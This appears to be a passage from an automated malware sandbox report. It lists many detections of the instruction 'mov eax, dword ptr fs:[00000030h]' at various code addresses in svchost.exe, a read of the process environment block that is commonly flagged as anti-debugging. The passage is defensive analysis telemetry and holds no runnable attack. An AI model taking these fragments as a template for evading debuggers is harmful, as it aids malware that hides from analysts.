Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]	7_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]	7_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]	7_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]	7_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]	7_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]	7_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]	7_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034663FF mov eax, dword ptr fs:[00000030h]	7_2_034663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342E388 mov eax, dword ptr fs:[00000030h]	7_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342E388 mov eax, dword ptr fs:[00000030h]	7_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342E388 mov eax, dword ptr fs:[00000030h]	7_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345438F mov eax, dword ptr fs:[00000030h]	7_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345438F mov eax, dword ptr fs:[00000030h]	7_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03428397 mov eax, dword ptr fs:[00000030h]	7_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03428397 mov eax, dword ptr fs:[00000030h]	7_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03428397 mov eax, dword ptr fs:[00000030h]	7_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B8243 mov eax, dword ptr fs:[00000030h]	7_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B8243 mov ecx, dword ptr fs:[00000030h]	7_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0350625D mov eax, dword ptr fs:[00000030h]	7_2_0350625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342A250 mov eax, dword ptr fs:[00000030h]	7_2_0342A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03436259 mov eax, dword ptr fs:[00000030h]	7_2_03436259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034EA250 mov eax, dword ptr fs:[00000030h]	7_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034EA250 mov eax, dword ptr fs:[00000030h]	7_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03434260 mov eax, dword ptr fs:[00000030h]	7_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03434260 mov eax, dword ptr fs:[00000030h]	7_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03434260 mov eax, dword ptr fs:[00000030h]	7_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342826B mov eax, dword ptr fs:[00000030h]	7_2_0342826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]	7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]	7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]	7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]	7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]	7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]	7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]	7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]	7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]	7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]	7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]	7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]	7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342823B mov eax, dword ptr fs:[00000030h]	7_2_0342823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_035062D6 mov eax, dword ptr fs:[00000030h]	7_2_035062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034402E1 mov eax, dword ptr fs:[00000030h]	7_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034402E1 mov eax, dword ptr fs:[00000030h]	7_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034402E1 mov eax, dword ptr fs:[00000030h]	7_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E284 mov eax, dword ptr fs:[00000030h]	7_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E284 mov eax, dword ptr fs:[00000030h]	7_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B0283 mov eax, dword ptr fs:[00000030h]	7_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B0283 mov eax, dword ptr fs:[00000030h]	7_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B0283 mov eax, dword ptr fs:[00000030h]	7_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034402A0 mov eax, dword ptr fs:[00000030h]	7_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034402A0 mov eax, dword ptr fs:[00000030h]	7_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]	7_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C62A0 mov ecx, dword ptr fs:[00000030h]	7_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]	7_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]	7_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]	7_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]	7_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C4144 mov eax, dword ptr fs:[00000030h]	7_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C4144 mov eax, dword ptr fs:[00000030h]	7_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C4144 mov ecx, dword ptr fs:[00000030h]	7_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C4144 mov eax, dword ptr fs:[00000030h]	7_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C4144 mov eax, dword ptr fs:[00000030h]	7_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342C156 mov eax, dword ptr fs:[00000030h]	7_2_0342C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C8158 mov eax, dword ptr fs:[00000030h]	7_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03436154 mov eax, dword ptr fs:[00000030h]	7_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03436154 mov eax, dword ptr fs:[00000030h]	7_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03504164 mov eax, dword ptr fs:[00000030h]	7_2_03504164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03504164 mov eax, dword ptr fs:[00000030h]	7_2_03504164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]	7_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE10E mov ecx, dword ptr fs:[00000030h]	7_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]	7_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]	7_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE10E mov ecx, dword ptr fs:[00000030h]	7_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]	7_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]	7_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE10E mov ecx, dword ptr fs:[00000030h]	7_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]	7_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE10E mov ecx, dword ptr fs:[00000030h]	7_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DA118 mov ecx, dword ptr fs:[00000030h]	7_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DA118 mov eax, dword ptr fs:[00000030h]	7_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DA118 mov eax, dword ptr fs:[00000030h]	7_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DA118 mov eax, dword ptr fs:[00000030h]	7_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F0115 mov eax, dword ptr fs:[00000030h]	7_2_034F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03460124 mov eax, dword ptr fs:[00000030h]	7_2_03460124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F61C3 mov eax, dword ptr fs:[00000030h]	7_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F61C3 mov eax, dword ptr fs:[00000030h]	7_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]	7_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_035061E5 mov eax, dword ptr fs:[00000030h]	7_2_035061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034601F8 mov eax, dword ptr fs:[00000030h]	7_2_034601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03470185 mov eax, dword ptr fs:[00000030h]	7_2_03470185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034EC188 mov eax, dword ptr fs:[00000030h]	7_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034EC188 mov eax, dword ptr fs:[00000030h]	7_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D4180 mov eax, dword ptr fs:[00000030h]	7_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D4180 mov eax, dword ptr fs:[00000030h]	7_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B019F mov eax, dword ptr fs:[00000030h]	7_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B019F mov eax, dword ptr fs:[00000030h]	7_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B019F mov eax, dword ptr fs:[00000030h]	7_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B019F mov eax, dword ptr fs:[00000030h]	7_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342A197 mov eax, dword ptr fs:[00000030h]	7_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342A197 mov eax, dword ptr fs:[00000030h]	7_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342A197 mov eax, dword ptr fs:[00000030h]	7_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03432050 mov eax, dword ptr fs:[00000030h]	7_2_03432050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B6050 mov eax, dword ptr fs:[00000030h]	7_2_034B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345C073 mov eax, dword ptr fs:[00000030h]	7_2_0345C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B4000 mov ecx, dword ptr fs:[00000030h]	7_2_034B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]	7_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]	7_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]	7_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]	7_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]	7_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]	7_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]	7_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]	7_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344E016 mov eax, dword ptr fs:[00000030h]	7_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344E016 mov eax, dword ptr fs:[00000030h]	7_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344E016 mov eax, dword ptr fs:[00000030h]	7_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344E016 mov eax, dword ptr fs:[00000030h]	7_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342A020 mov eax, dword ptr fs:[00000030h]	7_2_0342A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342C020 mov eax, dword ptr fs:[00000030h]	7_2_0342C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C6030 mov eax, dword ptr fs:[00000030h]	7_2_034C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B20DE mov eax, dword ptr fs:[00000030h]	7_2_034B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]	7_2_0342A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034380E9 mov eax, dword ptr fs:[00000030h]	7_2_034380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B60E0 mov eax, dword ptr fs:[00000030h]	7_2_034B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342C0F0 mov eax, dword ptr fs:[00000030h]	7_2_0342C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034720F0 mov ecx, dword ptr fs:[00000030h]	7_2_034720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343208A mov eax, dword ptr fs:[00000030h]	7_2_0343208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034280A0 mov eax, dword ptr fs:[00000030h]	7_2_034280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C80A8 mov eax, dword ptr fs:[00000030h]	7_2_034C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F60B8 mov eax, dword ptr fs:[00000030h]	7_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F60B8 mov ecx, dword ptr fs:[00000030h]	7_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346674D mov esi, dword ptr fs:[00000030h]	7_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346674D mov eax, dword ptr fs:[00000030h]	7_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346674D mov eax, dword ptr fs:[00000030h]	7_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03430750 mov eax, dword ptr fs:[00000030h]	7_2_03430750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034BE75D mov eax, dword ptr fs:[00000030h]	7_2_034BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472750 mov eax, dword ptr fs:[00000030h]	7_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472750 mov eax, dword ptr fs:[00000030h]	7_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B4755 mov eax, dword ptr fs:[00000030h]	7_2_034B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03438770 mov eax, dword ptr fs:[00000030h]	7_2_03438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]	7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]	7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]	7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]	7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]	7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]	7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]	7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]	7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]	7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]	7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]	7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]	7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346C700 mov eax, dword ptr fs:[00000030h]	7_2_0346C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03430710 mov eax, dword ptr fs:[00000030h]	7_2_03430710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03460710 mov eax, dword ptr fs:[00000030h]	7_2_03460710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346C720 mov eax, dword ptr fs:[00000030h]	7_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346C720 mov eax, dword ptr fs:[00000030h]	7_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346273C mov eax, dword ptr fs:[00000030h]	7_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346273C mov ecx, dword ptr fs:[00000030h]	7_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346273C mov eax, dword ptr fs:[00000030h]	7_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AC730 mov eax, dword ptr fs:[00000030h]	7_2_034AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343C7C0 mov eax, dword ptr fs:[00000030h]	7_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B07C3 mov eax, dword ptr fs:[00000030h]	7_2_034B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034527ED mov eax, dword ptr fs:[00000030h]	7_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034527ED mov eax, dword ptr fs:[00000030h]	7_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034527ED mov eax, dword ptr fs:[00000030h]	7_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034BE7E1 mov eax, dword ptr fs:[00000030h]	7_2_034BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034347FB mov eax, dword ptr fs:[00000030h]	7_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034347FB mov eax, dword ptr fs:[00000030h]	7_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D678E mov eax, dword ptr fs:[00000030h]	7_2_034D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034307AF mov eax, dword ptr fs:[00000030h]	7_2_034307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E47A0 mov eax, dword ptr fs:[00000030h]	7_2_034E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344C640 mov eax, dword ptr fs:[00000030h]	7_2_0344C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F866E mov eax, dword ptr fs:[00000030h]	7_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F866E mov eax, dword ptr fs:[00000030h]	7_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346A660 mov eax, dword ptr fs:[00000030h]	7_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346A660 mov eax, dword ptr fs:[00000030h]	7_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03462674 mov eax, dword ptr fs:[00000030h]	7_2_03462674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AE609 mov eax, dword ptr fs:[00000030h]	7_2_034AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]	7_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]	7_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]	7_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]	7_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]	7_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]	7_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]	7_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472619 mov eax, dword ptr fs:[00000030h]	7_2_03472619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344E627 mov eax, dword ptr fs:[00000030h]	7_2_0344E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03466620 mov eax, dword ptr fs:[00000030h]	7_2_03466620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03468620 mov eax, dword ptr fs:[00000030h]	7_2_03468620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343262C mov eax, dword ptr fs:[00000030h]	7_2_0343262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]	7_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346A6C7 mov eax, dword ptr fs:[00000030h]	7_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B06F1 mov eax, dword ptr fs:[00000030h]	7_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B06F1 mov eax, dword ptr fs:[00000030h]	7_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03434690 mov eax, dword ptr fs:[00000030h]	7_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03434690 mov eax, dword ptr fs:[00000030h]	7_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346C6A6 mov eax, dword ptr fs:[00000030h]	7_2_0346C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034666B0 mov eax, dword ptr fs:[00000030h]	7_2_034666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03438550 mov eax, dword ptr fs:[00000030h]	7_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03438550 mov eax, dword ptr fs:[00000030h]	7_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346656A mov eax, dword ptr fs:[00000030h]	7_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346656A mov eax, dword ptr fs:[00000030h]	7_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346656A mov eax, dword ptr fs:[00000030h]	7_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C6500 mov eax, dword ptr fs:[00000030h]	7_2_034C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]	7_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]	7_2_03504500
